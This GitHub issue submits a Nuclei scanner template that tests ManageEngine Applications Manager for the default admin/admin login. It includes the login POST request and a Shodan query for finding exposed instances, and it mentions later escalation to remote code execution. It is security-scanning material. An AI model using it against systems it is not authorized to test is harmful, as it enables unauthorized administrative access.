### ISSUE TITLE
My first contribution xD

### ISSUE THREAD

**Issue by 0midC13** [projectdiscovery/nuclei-templates#11670]
### Is there an existing template for this?

- [x] I have searched the existing templates.

### Nuclei Template

```yaml
id: manage-engine-default-login

info:
  name: ManageEngine Applications Manager - Default Credentials
  author: 0midC13
  severity: high
  description: |
    Default credentials grants administrative access to ManageEngine Applications Manager, which can be later escalated into a RCE via DB queries.
  reference:
    - https://www.manageengine.com/products/applications_manager/
  metadata:
    shodan-query: title:"Applications Manager Login Screen"
    verified: true
    max-request: 1
  tags: default-login,manageengine,zoho

variables:
  username: "admin"
  password: "admin"

http:
  - method: POST
    path:
      - "{{BaseURL}}/j_security_check"

    body: |
      clienttype=html&webstart=&j_username=admin&ScreenWidth=1280&ScreenHeight=709&username={{username}}&j_password={{password}}

    headers:
      Content-Type: application/x-www-form-urlencoded

    matchers:
      - type: word
        part: body
        words:
          - "/AppManager"
          - "Applications Manager"
        condition: and
```

### Relevant dumped responses

```shell

```
